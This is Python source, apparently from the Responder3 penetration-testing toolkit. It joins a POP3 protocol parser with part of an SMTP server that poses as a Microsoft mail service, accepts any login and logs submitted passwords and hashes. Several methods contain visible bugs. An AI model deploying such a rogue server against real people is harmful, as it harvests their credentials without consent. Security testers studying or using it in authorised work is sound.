# https://www.ietf.org/rfc/rfc1939.txt
# https://www.ietf.org/rfc/rfc2449.txt
import hashlib
import io
import enum
import asyncio
from responder3.core.commons import read_element
from responder3.core.logging.log_objects import Credential
from responder3.core.asyncio_helpers import *


class POP3AuthMethod(enum.Enum):
	PLAIN = enum.auto()
	APOP = enum.auto()
	AUTH = enum.auto()


class POP3State(enum.Enum):
	AUTHORIZATION = enum.auto()
	TRANSACTION = enum.auto()
	UPDATE = enum.auto()


class POP3ResponseStatus(enum.Enum):
	OK = '+OK'
	ERR = '-ERR'
	XXXX = 'XXXX'


class POP3Command(enum.Enum):
	QUIT = enum.auto()
	STAT = enum.auto()
	LIST = enum.auto()
	RETR = enum.auto()
	DELE = enum.auto()
	NOOP = enum.auto()
	RSET = enum.auto()
	TOP = enum.auto()
	UIDL = enum.auto()
	USER = enum.auto()
	PASS = enum.auto()
	APOP = enum.auto()
	CAPA = enum.auto()
	AUTH = enum.auto()
	XXXX = enum.auto()
	STLS = enum.auto()


POP3TransactionStateCommands = [
	POP3Command.TOP,
	POP3Command.UIDL,
	POP3Command.STAT,
	POP3Command.LIST,
	POP3Command.RETR,
	POP3Command.DELE,
	POP3Command.NOOP,
	POP3Command.RSET,
	POP3Command.CAPA,
	POP3Command.QUIT,
]

POP3AuthorizationStateCommands = [
	POP3Command.USER,
	POP3Command.PASS,
	POP3Command.APOP,
	POP3Command.CAPA,
	POP3Command.QUIT,
	POP3Command.AUTH,
	POP3Command.STLS,
]

POP3UpdateStateCommands = [
	POP3Command.QUIT,
]


class POP3CommandParser:
	def __init__(self, encoding='ascii', timeout = 60):
		self.encoding = encoding
		self.timeout = timeout

	async def from_streamreader(self, reader):
		cmd = await readline_or_exc(reader, timeout=self.timeout)
		return self.from_bytes(cmd)

	def from_bytes(self, bbuff):
		return self.from_buffer(io.BytesIO(bbuff))

	def from_buffer(self, buff):
		line = buff.readline()
		try:
			command, *params = line.strip().decode(self.encoding).split(' ')
			if command in POP3Command.__members__:
				return POP3CMD[POP3Command[command]].from_bytes(line)
			else:
				return POP3XXXXCmd.from_bytes(line)
		except Exception as e:
			print(str(e))
			return POP3XXXXCmd.from_bytes(line)


class POP3QUITCmd:
	# NO ARGS
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.QUIT

	def from_buffer(buff, encoding='ascii'):
		return POP3QUITCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3QUITCmd()
		cmd.command = POP3Command[bbuff]
		return cmd

	def construct():
		cmd = POP3QUITCmd()
		return cmd

	def to_bytes(self):
		return ('%s %s\r\n' % self.command.value).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'ARGS    : %s\r\n' % None
		return t

class POP3CAPACmd:
	# NO ARGS
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.CAPA

	def from_buffer(buff, encoding='ascii'):
		return POP3CAPACmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3CAPACmd()
		cmd.command = POP3Command[bbuff]
		return cmd

	def construct():
		cmd = POP3CAPACmd()
		return cmd

	def to_bytes(self):
		return ('%s %s\r\n' % self.command.value).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		return t

class POP3STLSCmd:
	# NO ARGS
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.STLS

	def from_buffer(buff, encoding='ascii'):
		return POP3STLSCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3STLSCmd()
		cmd.command = POP3Command[bbuff]
		return cmd

	def construct():
		cmd = POP3STLSCmd()
		return cmd

	def to_bytes(self):
		return ('%s %s\r\n' % self.command.value).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'ARGS    : %s\r\n' % None
		return t

class POP3STATCmd:
	# NO ARGS
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.STAT

	def from_buffer(buff, encoding='ascii'):
		return POP3STATCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3STATCmd()
		cmd.command = POP3Command[bbuff]
		return cmd

	def construct():
		cmd = POP3STATCmd()
		return cmd

	def to_bytes(self):
		return ('%s %s\r\n' % self.command.value).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'ARGS    : %s\r\n' % None
		return t


class POP3LISTCmd:
	# optional argument for the messagenumber
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.LIST
		self.msgno = None

	def from_buffer(buff, encoding='ascii'):
		return POP3LISTCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3LISTCmd()
		t, bbuff = read_element(bbuff, toend=True)
		cmd.command = POP3Command[t]
		if bbuff.strip() != '':
			cmd.msgno, bbuff = read_element(bbuff, toend=True)
		return cmd

	def construct(msgno=None):
		cmd = POP3LISTCmd()
		cmd.msgno = msgno
		return cmd

	def to_bytes(self):
		if self.msgno is not None:
			return ('%s %s\r\n' % (self.command.value, self.msgno)).encode(self.encoding)
		else:
			return ('%s\r\n' % self.command.value).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'Msgno    : %s\r\n' % self.msgno
		return t


class POP3RETRCmd():
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.RETR
		self.msgno = None

	def from_buffer(buff, encoding='ascii'):
		return POP3RETRCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3RETRCmd()
		t, bbuff = read_element(bbuff, toend=True)
		cmd.command = POP3Command[t]
		if bbuff.strip() != '':
			cmd.msgno, bbuff = read_element(bbuff, toend=True)
		return cmd

	def construct(msgno):
		cmd = POP3RETRCmd()
		cmd.msgno = msgno
		return cmd

	def to_bytes(self):
		return ('%s %s\r\n' % (self.command.value, self.msgno)).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'Msgno    : %s\r\n' % self.msgno
		return t


class POP3DELECmd():
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.DELE
		self.msgno = None

	def from_buffer(buff, encoding='ascii'):
		return POP3DELECmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3DELECmd()
		t, bbuff = read_element(bbuff, toend=True)
		cmd.command = POP3Command[t]
		cmd.msgno, bbuff = read_element(bbuff, toend=True)
		return cmd

	def construct(msgno):
		cmd = POP3DELECmd()
		cmd.msgno = msgno
		return cmd

	def to_bytes(self):
		return ('%s %s\r\n' % (self.command.value, self.msgno)).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'Msgno    : %s\r\n' % self.msgno
		return t


class POP3TOPCmd():
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.TOP
		self.msgno = None
		self.numlines = None

	def from_buffer(buff, encoding='ascii'):
		return POP3TOPCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3TOPCmd()
		t, bbuff = read_element(bbuff)
		cmd.command = POP3Command[t]
		cmd.msgno, bbuff = read_element(bbuff)
		cmd.numlines, bbuff = read_element(bbuff, toend=True)
		return cmd

	def construct(msgno, numlines):
		cmd = POP3TOPCmd()
		cmd.msgno = msgno
		cmd.numlines = numlines
		return cmd

	def to_bytes(self):
		return ('%s %s %s\r\n' % (self.command.value, self.msgno, self.numlines)).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command  : %s\r\n' % self.command.name
		t += 'Msgno    : %s\r\n' % self.msgno
		t += 'Numlines : %s\r\n' % self.numlines
		return t


class POP3UIDLCmd():
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.UIDL
		self.msgno = None

	def from_buffer(buff, encoding='ascii'):
		return POP3UIDLCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3UIDLCmd()
		t, bbuff = read_element(bbuff, toend=True)
		cmd.command = POP3Command[t]
		if bbuff.strip() != '':
			cmd.msgno, bbuff = read_element(bbuff, toend=True)
		return cmd

	def construct(msgno):
		cmd = POP3UIDLCmd()
		cmd.msgno = msgno
		return cmd

	def to_bytes(self):
		return ('%s %s\r\n' % (self.command.value, self.msgno)).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'Msgno    : %s\r\n' % self.msgno
		return t


class POP3NOOPCmd():
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.NOOP

	def from_buffer(buff, encoding='ascii'):
		return POP3NOOPCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3NOOPCmd()
		cmd.command = POP3Command[bbuff]
		return cmd

	def construct():
		cmd = POP3NOOPCmd()
		return cmd

	def to_bytes(self):
		return ('%s\r\n' % self.command.value).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'ARGS    : %s\r\n' % None
		return t

class POP3AUTHCmd:
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.AUTH
		self.auth_type = None

	def from_buffer(buff, encoding='ascii'):
		return POP3AUTHCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3AUTHCmd()
		t, bbuff = read_element(bbuff, toend=True)
		cmd.command = POP3Command[t]
		if bbuff.strip() != '':
			cmd.auth_type, bbuff = read_element(bbuff, toend=True)
		return cmd

	def construct(auth_type):
		cmd = POP3AUTHCmd()
		cmd.auth_type = auth_type
		return cmd

	def to_bytes(self):
		return ('%s %s\r\n' % (self.command.value, self.auth_type)).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command   : %s\r\n' % self.command.name
		t += 'Auth-type : %s\r\n' % self.auth_type
		return t

class POP3USERCmd():
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.USER
		self.username = None

	def from_buffer(buff, encoding='ascii'):
		return POP3USERCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3USERCmd()
		t, bbuff = read_element(bbuff)
		cmd.command = POP3Command[t]
		cmd.username, bbuff = read_element(bbuff, toend=True)
		return cmd

	def construct(username):
		cmd = POP3USERCmd()
		cmd.username = username
		return cmd

	def to_bytes(self):
		return ('%s %s\r\n' % (self.command.value, self.username)).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'Username    : %s\r\n' % self.username
		return t


class POP3PASSCmd():
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.PASS
		self.password = None

	def from_buffer(buff, encoding='ascii'):
		return POP3PASSCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3PASSCmd()
		t, bbuff = read_element(bbuff)
		cmd.command = POP3Command[t]
		cmd.password, bbuff = read_element(bbuff, toend=True)
		return cmd

	def construct(password):
		cmd = POP3PASSCmd()
		cmd.password = password
		return cmd

	def to_bytes(self):
		return ('%s %s\r\n' % (self.command.value, self.password)).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'Password: %s\r\n' % self.password
		return t


class POP3APOPCmd():
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.APOP
		self.username = None
		self.digest = None

	def from_buffer(buff, encoding='ascii'):
		return POP3APOPCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3APOPCmd()
		t, bbuff = read_element(bbuff)
		cmd.command = POP3Command[t]
		cmd.username, bbuff = read_element(bbuff)
		cmd.digest, bbuff = read_element(bbuff, toend=True)
		return cmd

	def construct(username, digest):
		cmd = POP3APOPCmd()
		cmd.username = username
		cmd.digest = digest
		return cmd

	def to_bytes(self):
		return ('%s %s %s\r\n' % (self.command.value, self.username, self.digest)).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command  : %s\r\n' % self.command.name
		t += 'username : %s\r\n' % self.username
		t += 'Digest   : %s\r\n' % self.digest
		return t


class POP3RSETCmd():
	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.RSET

	def from_buffer(buff, encoding='ascii'):
		return POP3RSETCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3RSETCmd()
		cmd.command = POP3Command[bbuff]
		return cmd

	def construct():
		cmd = POP3RSETCmd()
		return cmd

	def to_bytes(self):
		return ('%s\r\n' % self.command.value).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'ARGS    : %s\r\n' % None
		return t


class POP3XXXXCmd():
	"""
	Generic catch-all for all unparsable command
	"""

	def __init__(self, encoding='ascii'):
		self.encoding = encoding
		self.command = POP3Command.XXXX
		self.data = None

	def from_buffer(buff, encoding='ascii'):
		return POP3RSETCmd.from_bytes(buff.readline(), encoding)

	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = POP3XXXXCmd()
		cmd.data = bbuff
		return cmd

	def construct(data):
		cmd = POP3XXXXCmd()
		cmd.data = data
		return cmd

	def to_bytes(self):
		return ('%s\r\n' % self.data).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Command ==\r\n' % self.command.name
		t += 'Command : %s\r\n' % self.command.name
		t += 'DATA    : %s\r\n' % self.data
		return t


class POP3ResponseParser():
	def __init__(self, encoding='ascii'):
		self.encoding = encoding

	# POP3ResponseStatus

	async def from_streamreader(self, reader, is_multiline=False):
		if is_multiline:
			resp = b''
			while True:
				t = await readline_or_exc(reader, timeout=self.timeout)
				resp += t
				if t.strip() == b'.':
					break
			return self.from_bytes(resp)

		else:
			resp = await readline_or_exc(reader, timeout=self.timeout)
			return self.from_bytes(resp)

	def from_bytes(self, bbuff, is_multiline=False):
		return self.from_buffer(io.BytesIO(bbuff), is_multiline)

	def from_buffer(self, buff, is_multiline=False):
		line = buff.readline()
		respcode, *params = line.strip().decode(self.encoding).split(' ')
		try:
			return POP3RESP[POP3ResponseStatus(respcode)].from_bytes(line)
		except Exception as e:
			print(str(e))
			return POP3XXXXResp.from_bytes(line)


class POP3XXXXResp:
	def __init__(self):
		self.status = POP3ResponseStatus.XXXX
		self.data = None

	@staticmethod
	def from_buffer(buff, encoding='ascii'):
		return POP3XXXXResp.from_bytes(buff.readline(), encoding)

	@staticmethod
	def from_bytes(bbuff, encoding='ascii'):
		resp = POP3XXXXResp()
		resp.data = bbuff.decode(encoding).strip()
		return resp

	def to_bytes(self):
		return ('%s\r\n' % self.data).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Response ==\r\n' % self.status.name
		t += 'DATA    : %s\r\n' % self.data
		return t


class POP3OKResp():
	def __init__(self,encoding = 'ascii'):
		self.encoding = encoding
		self.status = POP3ResponseStatus.OK
		self.params = None
		self.data = None

	@staticmethod
	def from_buffer(buff, encoding='ascii'):
		return POP3OKResp.from_bytes(buff.readline(), encoding)

	@staticmethod
	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip().split('\r\n')
		resp = POP3OKResp()
		status, resp.params = read_element(bbuff[0], toend=True)
		resp.status = POP3ResponseStatus(status)
		if len(bbuff) > 1:
			resp.data = bbuff[1:]

		return resp

	@staticmethod
	def construct(params = '', data=None):
		resp = POP3OKResp()
		resp.params = params
		resp.data = data
		return resp

	def to_bytes(self):
		if self.data is None:
			if self.params is None:
				return ('%s\r\n' % self.status.value).encode(self.encoding)
			else:
				return ('%s %s\r\n' % (self.status.value, self.params)).encode(self.encoding)
		else:
			return

	def __repr__(self):
		t = '== POP3 %s Response ==\r\n' % self.status.name
		t += 'Params : %s\r\n' % self.params
		t += 'DATA    : %s\r\n' % self.data
		return t


class POP3ERRResp():
	def __init__(self,encoding = 'ascii'):
		self.encoding = encoding
		self.status = POP3ResponseStatus.OK
		self.params = None

	@staticmethod
	def from_buffer(buff, encoding='ascii'):
		return POP3ERRResp.from_bytes(buff.readline(), encoding)

	@staticmethod
	def from_bytes(bbuff, encoding='ascii'):
		bbuff = bbuff.decode(encoding).strip()
		resp = POP3ERRResp()
		status, resp.params = read_element(bbuff, toend=True)
		resp.status = POP3ResponseStatus(status)
		return resp

	@staticmethod
	def construct(params=None):
		resp = POP3ERRResp()
		resp.params = params
		return resp

	def to_bytes(self):
		if self.params is None:
			return ('%s\r\n' % self.status.value).encode(self.encoding)
		else:
			return ('%s %s\r\n' % (self.status.value, self.params)).encode(self.encoding)

	def __repr__(self):
		t = '== POP3 %s Response ==\r\n' % self.status.name
		t += 'Params : %s\r\n' % self.params
		return t


class POP3AuthStatus(enum.Enum):
	OK = enum.auto()
	NO = enum.auto()
	MORE_DATA_NEEDED = enum.auto()


class POP3AuthHandler:
	def __init__(self, authtype, creds=None, salt = None):
		if authtype == POP3AuthMethod.PLAIN:
			self.authahndler = POP3PlainAuth(creds)
		elif authtype == POP3AuthMethod.AUTH:
			self.authahndler = POP3AUTHAuth(creds)
		elif authtype == POP3AuthMethod.APOP:
			self.authahndler = POP3APOPAuth(creds, salt)
		else:
			raise NotImplementedError

	def do_AUTH(self, pop3cmd, salt = None):
		return self.authahndler.update_creds(pop3cmd)

#
#

class POP3AUTHAuth:
	def __init__(self, creds):
		self.creds = creds
		self.username = None
		self.password = None

	def update_creds(self, pop3cmd):
		if pop3cmd.command == POP3Command.AUTH:
			return POP3AuthStatus.MORE_DATA_NEEDED, b'\r\n'
		
		if not self.username:
			self.username = pop3cmd.username
			return POP3AuthStatus.MORE_DATA_NEEDED, POP3OKResp.construct('').to_bytes()

		elif not self.password:
			self.password = pop3cmd.password

		else:
			raise Exception('Wrong command for authentication!')

		if self.username is not None and self.password is not None:
			return self.verify_creds()

		else:
			return POP3AuthStatus.MORE_DATA_NEEDED, b'\r\n'

	def verify_creds(self):
		c = POP3PlainCred(self.username, self.password)
		if self.creds is None:
			return POP3AuthStatus.OK, c.toCredential()
		else:
			if c.username in self.creds:
				if self.creds[c.username] == c.password:
					return POP3AuthStatus.OK, c.toCredential()
			else:
				return POP3AuthStatus.NO, c.toCredential()

		return POP3AuthStatus.NO, c.toCredential()


class POP3APOPAuth:
	def __init__(self, creds, salt):
		self.creds = creds
		self.salt = salt
		self.digest = None
		self.username = None

	def update_creds(self, pop3cmd):
		if pop3cmd.command == POP3Command.APOP:
			self.username = pop3cmd.username
			self.digest = pop3cmd.digest
			return self.verify_creds()
		else:
			raise Exception('Wrong command for authentication!')

	def verify_creds(self):
		c = POP3APOPCred(self.username, self.digest, self.salt)
		if self.creds is None:
			return POP3AuthStatus.OK, c.toCredential()
		else:
			if c.username in self.creds:
				calc_digest = hashlib.md5(self.salt.encode() + self.creds[c.username].encode()).hexdigest()
				if calc_digest == self.digest:
					return POP3AuthStatus.OK, c.toCredential()

			else:
				return POP3AuthStatus.NO, c.toCredential()

		return POP3AuthStatus.NO, c.toCredential()


class POP3APOPCred:
	def __init__(self, username, digest, salt):
		self.username = username
		self.digest = digest
		self.salt = salt

	def toCredential(self):
		return Credential('APOP',
						  username=self.username,
						  fullhash='%s:%s:%s' % (self.username, self.digest, self.salt)
						  )


class POP3PlainAuth:
	def __init__(self, creds):
		self.creds = creds
		self.username = None
		self.password = None

	def update_creds(self, pop3cmd):
		if pop3cmd.command == POP3Command.USER:
			self.username = pop3cmd.username

		elif pop3cmd.command == POP3Command.PASS:
			self.password = pop3cmd.password

		else:
			raise Exception('Wrong command for authentication!')

		if self.username is not None and self.password is not None:
			return self.verify_creds()

		else:
			return POP3AuthStatus.MORE_DATA_NEEDED, POP3OKResp.construct('').to_bytes()

	def verify_creds(self):
		c = POP3PlainCred(self.username, self.password)
		if self.creds is None:
			return POP3AuthStatus.OK, c.toCredential()
		else:
			if c.username in self.creds:
				if self.creds[c.username] == c.password:
					return POP3AuthStatus.OK, c.toCredential()

			else:
				return POP3AuthStatus.NO, c.toCredential()

		return POP3AuthStatus.NO, c.toCredential()

class POP3PlainCred:
	def __init__(self, username, password):
		self.username = username
		self.password = password

	def toCredential(self):
		return Credential('PLAIN',
						  username=self.username,
						  password=self.password,
						  fullhash='%s:%s' % (self.username, self.password)
						  )


POP3RESP = {
	POP3ResponseStatus.OK : POP3OKResp,
	POP3ResponseStatus.ERR: POP3ERRResp,
}

POP3CMD = {
	POP3Command.QUIT: POP3QUITCmd,
	POP3Command.STAT: POP3STATCmd,
	POP3Command.LIST: POP3LISTCmd,
	POP3Command.RETR: POP3RETRCmd,
	POP3Command.DELE: POP3DELECmd,
	POP3Command.NOOP: POP3NOOPCmd,
	POP3Command.RSET: POP3RSETCmd,
	POP3Command.TOP : POP3TOPCmd,
	POP3Command.UIDL: POP3UIDLCmd,
	POP3Command.USER: POP3USERCmd,
	POP3Command.PASS: POP3PASSCmd,
	POP3Command.APOP: POP3APOPCmd,
	POP3Command.CAPA: POP3CAPACmd,
	POP3Command.XXXX: POP3XXXXCmd,
	POP3Command.AUTH: POP3AUTHCmd,
	POP3Command.STLS: POP3STLSCmd,
}



import logging
import asyncio
import email.parser

from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import R3ConnectionClosed
from responder3.core.commons import *
from responder3.protocols.SMTP import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession
from responder3.core.ssl import get_default_server_ctx


class SMTPSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.creds = {} # {'alma':'alma2'}
		self.salt = None
		self.encoding = 'utf8'  # THIS CAN CHANGE ACCORING TO CLIENT REQUEST!!!
		self.parser = SMTPCommandParser(encoding=self.encoding)
		self.emailparser = email.parser.Parser()
		self.current_state = SMTPServerState.START
		self.supported_auth_types = [SMTPAuthMethod.LOGIN, SMTPAuthMethod.PLAIN, SMTPAuthMethod.CRAM_MD5]
		self.authhandler = None
		self.emailFrom = ''
		self.emailTo = []
		self.ssl_ctx = None

		self.capabilities = []
		self.helo_msg = None
		self.ehlo_msg = None
		#self.log_data = False


	def __repr__(self):
		t = '== SMTP Session ==\r\n'
		t += 'encoding     : %s\r\n' % repr(self.encoding)
		t += 'parser       : %s\r\n' % repr(self.parser)
		t += 'current_state: %s\r\n' % repr(self.current_state)
		t += 'authhandler  : %s\r\n' % repr(self.authhandler)
		return t


class SMTP(ResponderServer):
	def init(self):
		if self.settings:
			self.parse_settings()
			return
		self.set_default_settings()

	def set_default_settings(self):
		self.session.salt = '<1896.697170952@dbc.mtview.ca.us>' #this salt is used for CRAM-MD5
		self.session.helo_msg = 'mx.bocisajt.com Microsoft ESMTP MAIL Service ready'
		self.session.ehlo_msg = 'mx.bocisajt.com Microsoft ESMTP MAIL Service ready'
		self.session.capabilities.append('SMTPUTF8')
		self.session.capabilities.append('STARTTLS')
		if self.session.supported_auth_types is not None:
			self.session.capabilities.append('AUTH ' + ' '.join([a.name for a in self.session.supported_auth_types]))

		self.session.ssl_ctx = get_default_server_ctx()

	def parse_settings(self):
		if 'helo_msg' in self.settings:
			self.session.helo_msg = self.settings['helo_msg']
			self.session.ehlo_msg = self.settings['helo_msg']
		if 'ehlo_msg' in self.settings:
			self.session.ehlo_msg = self.settings['ehlo_msg']
			if not self.session.helo_msg:
				elf.session.helo_msg = self.settings['ehlo_msg']
		if 'salt' in self.settings:
			self.session.salt = self.settings['salt']
		# TODO: set atuth types from config!
		# then comment out the following lines
		if self.session.supported_auth_types is not None:
			self.session.capabilities.append('AUTH ' + ' '.join([a.name for a in self.session.supported_auth_types]))
		

	async def send_data(self, data):
		self.cwriter.write(data)
		await self.cwriter.drain()

	@r3trafficlogexception
	async def run(self):
		# send hello
		await asyncio.wait_for(
			self.send_data(SMTPReply.construct(220, '%s %s' % (self.session.helo_msg, self.session.salt)).to_bytes()), timeout=1)

		# main loop
		while not self.shutdown_evt.is_set():
			try:
				result = await asyncio.gather(*[asyncio.wait_for(self.session.parser.from_streamreader(self.creader), timeout=None)], return_exceptions=True)
			except asyncio.CancelledError as e:
				raise e
			if isinstance(result[0], R3ConnectionClosed):
				return
			elif isinstance(result[0], Exception):
				raise result[0]
			else:
				cmd = result[0]

			print(cmd)
			if 'R3DEEPDEBUG' in os.environ:
				await self.logger.debug(cmd)
				await self.logger.debug(self.session.current_state)

			if cmd.command == SMTPCommand.QUIT:
				await asyncio.wait_for(
						self.send_data(SMTPReply.construct(221).to_bytes()),
						timeout=1)
				return

			if self.session.current_state == SMTPServerState.START:
				if cmd.command == SMTPEHLOCmd or cmd.command == SMTPHELOCmd:
					if self.session.supported_auth_types is None:
						self.session.current_state = SMTPServerState.AUTHENTICATED

				if cmd.command == SMTPCommand.HELO:
					await asyncio.wait_for(
						self.send_data(
							SMTPReply.construct(250, [self.session.helo_msg] + self.session.capabilities).to_bytes()),
						timeout=1)
					continue

				elif cmd.command == SMTPCommand.EHLO:
					await asyncio.wait_for(
						self.send_data(
							SMTPReply.construct(250, [self.session.ehlo_msg] + self.session.capabilities).to_bytes()),
						timeout=1)
					continue

				elif cmd.command == SMTPCommand.STARTTLS:
					self.cwriter.pause_reading()
					await asyncio.wait_for(
						self.send_data(
							SMTPReply.construct(220, 'Go ahead').to_bytes()),
						timeout=1)
					await self.switch_ssl(self.session.ssl_ctx)
					continue

				elif cmd.command == SMTPCommand.EXPN:
					await asyncio.wait_for(
						self.send_data(SMTPReply.construct(502).to_bytes()),
						timeout=1)
					continue

				elif cmd.command == SMTPCommand.VRFY:
					await asyncio.wait_for(
						self.send_data(SMTPReply.construct(502).to_bytes()),
						timeout=1)
					continue

				elif cmd.command == SMTPCommand.AUTH:
					self.session.current_state = SMTPServerState.AUTHSTARTED
					# NOTE: the protocol allows the authentication data to be sent immediately by the client
					# if this happens, the initdata will be not none and needs to be evaluated.
					if cmd.mechanism == 'PLAIN':
						self.session.authhandler = SMTPAuthHandler(SMTPAuthMethod.PLAIN, self.session.creds)
						if cmd.data is not None:
							res, cred = self.session.authhandler.do_AUTH(cmd)
							if cred is not None:
								await self.logger.credential(cred)
							if res == SMTPAuthStatus.OK:
								self.session.current_state = SMTPServerState.AUTHENTICATED
								await asyncio.wait_for(
									self.send_data(SMTPReply.construct(235).to_bytes()),
									timeout=1)
								continue
							else:
								await asyncio.wait_for(
									self.send_data(SMTPReply.construct(535).to_bytes()),
									timeout=1)
								return
						else:
							await asyncio.wait_for(
								self.send_data(SMTPReply.construct(334).to_bytes()),
								timeout=1)
							continue

					elif cmd.mechanism == 'LOGIN':
						self.session.authhandler = SMTPAuthHandler(SMTPAuthMethod.LOGIN, self.session.creds)
						await asyncio.wait_for(
								self.send_data(SMTPReply.construct(334, 'VXNlcm5hbWU6').to_bytes()),
								timeout=1)
						continue
					else:
						await asyncio.wait_for(
							self.send_data(SMTPReply.construct(535).to_bytes()),
							timeout=1)
						raise Exception('Not supported auth mechanism, client tried to use %s' % cmd.mechanism)
				else:
					await asyncio.wait_for(
						self.send_data(SMTPReply.construct(503).to_bytes()),
						timeout=1)
					continue

			# this state is only for the authentication part
			elif self.session.current_state == SMTPServerState.AUTHSTARTED:
				"""
				here we expect to have non-smtp conform messages (without command code)
				"""
				if cmd.command == SMTPCommand.XXXX:
					res, res_data = self.session.authhandler.do_AUTH(cmd)
					if res in [SMTPAuthStatus.OK, SMTPAuthStatus.NO]:
						if res_data is not None:
							await self.logger.credential(res_data)
							
					if res == SMTPAuthStatus.OK:
						self.session.current_state = SMTPServerState.AUTHENTICATED
						await asyncio.wait_for(
							self.send_data(SMTPReply.construct(235).to_bytes()),
							timeout=1)
						continue

					if res == SMTPAuthStatus.MORE_DATA_NEEDED:
						await asyncio.wait_for(
						self.send_data(SMTPReply.construct(334, res_data).to_bytes()),
							timeout=1)
						continue
						
					if res == SMTPAuthStatus.NO:
						await asyncio.wait_for(
							self.send_data(SMTPReply.construct(535).to_bytes()),
							timeout=1)
						return

			# should be checking which commands are allowed in this state...
